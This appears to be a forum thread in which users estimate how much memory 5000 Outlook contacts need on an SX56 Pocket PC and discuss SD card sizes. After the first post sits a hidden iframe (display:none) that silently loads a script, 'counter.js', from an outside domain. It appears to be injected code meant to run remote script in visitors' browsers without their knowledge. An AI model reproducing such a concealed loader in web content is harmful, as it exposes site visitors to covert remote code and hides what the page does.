Large Outlook File Question

I have a quick question. I need to load a large address book into Outlook on my sx56. Does anyone know how much memory it will take to store 5000 contacts? I suppose that I can always put the file on the SD. Any idea what size flash I should buy? Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Not sure the exact memory to contacts ratio. But you can see relatively how much memory your contacts take up by right clicking on the Outlook folder Contacts (on pc) and and select properties. Then select folder size, that should reveal how much memory your contacts takes up.

If its under 30 megs, it should fit onto the SX56 assuming you don't want anything else loaded

Chances are 5000 records would only be a few megs so it should fit, just will take forever to sync via activesync.

should fit.... agree it would be slow

I don't know if you can store your contacts on a storage card, but it would probably not be a good result. Storage cards are much slower than main memory, and for something you use as often as contacts, you probably don't want to have the extra overhead.

I just checked the size of my contacts file (on the PC) using the procedure described. I have a little over 500 contacts, and the file is about 250K. That would seem so support a 2-3M sized estimage for 5000.

Please let us know what you find out.

SD Card

Your question on the storage card is one of budget and need. When I got mine, I went for a 256M because they were the largest affordable option. You don't have but the one slot, and if you are going to install apps on the card, you won't be able to remove it and swap other cards in (and still use the apps installed on it). I've seen 128M for $39 which is pretty reasonable.

Think about what you'll use it for. The large contacts file isn't really a driving force. I have about 10 CD's worth of MP3 files, a half dozen apps (some kind of large), and a lot of Mapopolis maps stored there.
